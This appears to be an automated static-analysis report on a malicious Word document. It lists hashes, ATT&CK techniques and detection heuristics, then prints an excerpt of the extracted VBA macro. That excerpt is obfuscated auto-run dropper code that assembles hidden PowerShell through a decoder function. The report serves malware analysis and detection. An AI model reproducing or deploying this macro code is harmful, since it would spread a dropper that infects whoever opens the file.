Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ef2e6152fe8c0757…

MALICIOUS

Office (OLE)

Size: 110.5 KB | Created: 2018-02-14 17:03:00 | Authoring application: Microsoft Office Word | First seen: 2018-02-19
MD5: c08672ad8988981e4e2da05cc5b8af80
SHA-1: e208b01a6d2e00e8c53d1f8b9c025a326c280c0e
SHA-256: ef2e6152fe8c07575ff05966bb8ca0f42fd820efb37de8431033312e6223924b
Risk Score: 244

Malware Insights

MITRE ATT&CK
T1059.005 (Command and Scripting Interpreter: Visual Basic); T1204.002 (User Execution: Malicious File)

The sample is a malicious OLE document containing VBA macros. The critical heuristics indicate the presence of a Shell() call within the AutoOpen macro, which is designed to execute arbitrary commands. This strongly suggests the document's purpose is to download and execute a secondary payload, a common dropper behavior.

Heuristics (8)

  • ClamAV: Doc.Dropper.Agent-6448970-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6448970-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 27644 bytes
SHA-256: 239d3ab629bbc3d4d01e38a553fd89ee5cc129f8d768d6802a5834eddb8617e4
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 1 long base64-like blob)

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "iChYPQuwno"
Function TbaUOSFU()
On Error Resume Next
MsQRYc = (TaJEG - Int(XdltQQ) * SktSuEWNnR / Oct(plOsroY) - (oHdMWRuRp - Sin(9580388)))
jaGbzV = (fLvmYCOzUS - Int(qjJuPVrfmwVu) * WoXWAAnjPK / Oct(DtwqpcoEDERz) - (cCYZK - Sin(2264861)))
WcEjPDowluN = (KQUPjirzTfD - Int(WXrVWBpJIQ) * WFrUuwbNWDiam / Oct(jHKlplYAp) - (fljCYUCXta - Sin(9541040)))
pwDJWZ = (cLQqmISPXG) + HJjkJKD("Ft3YU.de5DoCosyPJCc+JCc3+JCc+JCcyP3WnJCc+'+'JCcyP3+'+'yP3lCosOayP3+yP3JCc+JCcdFIyP3+yP3Coslede5KoRhbQti", 3, 93)
irwNdiHqbt = (PRpJSZpBB - Int(hMbYPB) * ouHTSiijjPip / Oct(DOIbuaUniR) - (fWkPsVOidj - Sin(5905444)))
VHMvLLoMP = (KCwiHcjJLMWD - Int(DzdphAGc) * owzSoNAzMvZ / Oct(wYwrMLzIQT) - (hwoWkowiYJiOAl - Sin(7883269)))
danZkTpsv = (VILzbiqFafwU - Int(GTOVwQVzrQKPN) * STKzG / Oct(WdzFTYDGi) - (EqbsRpPsDVTois - Sin(89042)))
dkXBLpUnP = (XswEznuiXTfR) + HJjkJKD("uXqPUricjtnUWCrbuzNDwjSFspPqc+Pqcublic +yJCc+JCcP3+yP3 zQPqc+PqcD'+'qPdzyPPqc+Pqc3+yP3QD + ryP3+'+'yP'+'3fPqc+PqcSNS'+'Pqc+PqcyP3+yP3JCc+JCcB yP3+yP3JCc+JPqc+PqcCc+aItwCRHZzWW", 26, 139)
ClhzQa = (UjdDRulEizGE - Int(KajwfWwiZoU) * qiIEXi / Oct(jwtutiwnGsk) - (NETOmfUQpV - Sin(1749094)))
nkQHIkt = (uIzbPczKQaYmQ - Int(pOjislpKHBX) * VZDSrLnw / Oct(lkWYdtZOnjjzHp) - (jGdXFk - Sin(267695)))
MTzSOQw = (EzGZHziNzRfEdK - Int(OsQwTVq) * OjziliPt / Oct(joSYXTRQ) - (Shfblc - Sin(4896509)))
wjBlWis = (CYMOQvLU) + HJjkJKD("wtc+PqcyP3+yPqc+PqcP3'+':DAlRTFmSRY", 3, 23)
rttdjzKqaH = (nnzVJq - Int(kEcBMEti) * IAInzHLRnh / Oct(XGrHUZ) - (sEsoG - Sin(1226819)))
YNmJqbaEdwL = (wTnScns - Int(upfEPMj) * jhbjviNUhn / Oct(AZlTuCawnXzLtQ) - (LBbPKsM - Sin(5530779)))
mrshUjHSN = (HiZQUGT - Int(onsmJWlCoNsE) * WhQkSLsSdHo / Oct(ZMPdKdjEOWGYYC) - (qNWiTYikzJ - Sin(6227328)))
ABANvAQd = (YPUprlrYwjNC) + HJjkJKD("vUNvSCwzVvrRWhATDJiOZhMCtRoFEXih(yP3+yP3ryP3+yP3fSyJCc+JC'+'cP3+yP3asfc in rfSPqc+PqcyP3+yPqc+PqcP3ADCXyP3+yP3){yP3+yP3try{ryP3+yP3fSPqc+PqcyP3+yPqc+PqcP3YyP3+yPhwp", 32, 130)
TcJnt = (ASAbrLQ - Int(CEHdVZubSTd) * ldvLZUjRUU / Oct(suHXMkVRUmOX) - (DDiQqiD - Sin(1052844)))
iKVoY = (IbWWoBXbwMiQOi - Int(BiqwCIp) * FhHWmTblQ / Oct(sljApvTutnC) - (zpUUOIrHDqTER - Sin(7905317)))
QAlitcnNail = (fkIXaRiWzhA - Int(udIPBUPkSCRFS) * JfBRbjAOoJkPb / Oct(OSXnNPwdu) - (RkBEPdTDEj - Sin(1673219)))
mBJwOSo = (pkKWZdk) + HJjkJKD("KkAzJc)Pqc)  -REPLace([c'+'har]99+[char]'+'65+[char]5'+'7),[char]1vFwjwFKBJoCf", 6, 61)
HIWBWHBX = (fkazrhvzLqhKvP - Int(zrhvWQo) * wfrJiPwoLAjdSu / Oct(OjzhiIwbwdJ) - (nzvhj - Sin(8201328)))
cbDsYjsz = (iUAYMjMBWJMl - Int(CMTMZjKnzDufZ) * KrPTCmd / Oct(KOLkzRHa) - (krPzbijI - Sin(9478659)))
FVVFaXbakq = (BiRFsnWCKGq - Int(zQmBFB) * ltjYlKoKNjMj / Oct(FGcltIS) - (aOwTbbswMaZiUL - Sin(7349675)))
kCmiDiNK = (pwimssVzfirD) + HJjkJKD("IffikkCbVGHTsWaFrJionaHShsGpwn+JCcP3+yP3AknLzvZIr", 31, 10)
GnLVVUlcW = (FKiwLAInzqu - Int(HfONOURw) * twYAKLTdzdAHkA / Oct(MHQIJJcoJ) - (jVsiUWtik - Sin(2307134)))
DDvCvN = (KwBppKw - Int(uNWftBG) * JmpQH / Oct(cdqaufG) - (YAoHCL - Sin(2968822)))
TspdiMzjncZ = (UziaPKJq - Int(jOSjwuvGvUXwOP) * GnoWqmzu / Oct(qRqmjARUAbNR) - (WcFtAHrrUFjL - Sin(3874178)))
zfOmHnfI = (fDsoAHwiqLi) + HJjkJKD("rpXMLlOhANiwtkATjzKAr]39).RePLaPqc'+'+PqccE(([Ch'+'Ar]6Pqc+Pqc7+[ChAr]111+[ChAr]115),[StrIJCc+JCc'+'Ng][ChAr]96'+').RePLacE(yPJCc+JCc3rfSyP3,yP3GliyP3).JCc+JCcRePLacE(yP3qPdyP3,P'+'qc+PqcHhvN", 20, 168)
XETVOvqAhL = (QMQzlsCw - Int(MGaMYvhAO) * zKdzBkaMpoW / Oct(hKBLKWCb) - (QhXSziNWHWzY - Sin(4095279)))
kwHqkZ = (HmOPM - Int(fNIztYP) * MkKwnqh / Oct(GfDCMphRZu) - (HuYvGqQ - Sin(1825566)))
wInzzpQli = (YXYZS - Int(KWLwk) * WijjMKwqfq / Oct(wMHQopDIX) - (dEiGijJfKFa - Sin(1971733)))
NcQkli = (avCDzmBB) + HJjkJKD("ZVGbMQPU.( $PShoME[4]+$psHoMe[30]+'X')( ((' . (('+'gv Pqc*mdr*Pqc).naMe[3,11,2]-joInPqcPqc) (((P'+'qc((JCc.((VaCdQkzuC", 9, 103)
tvsUNNuvJ
... (truncated)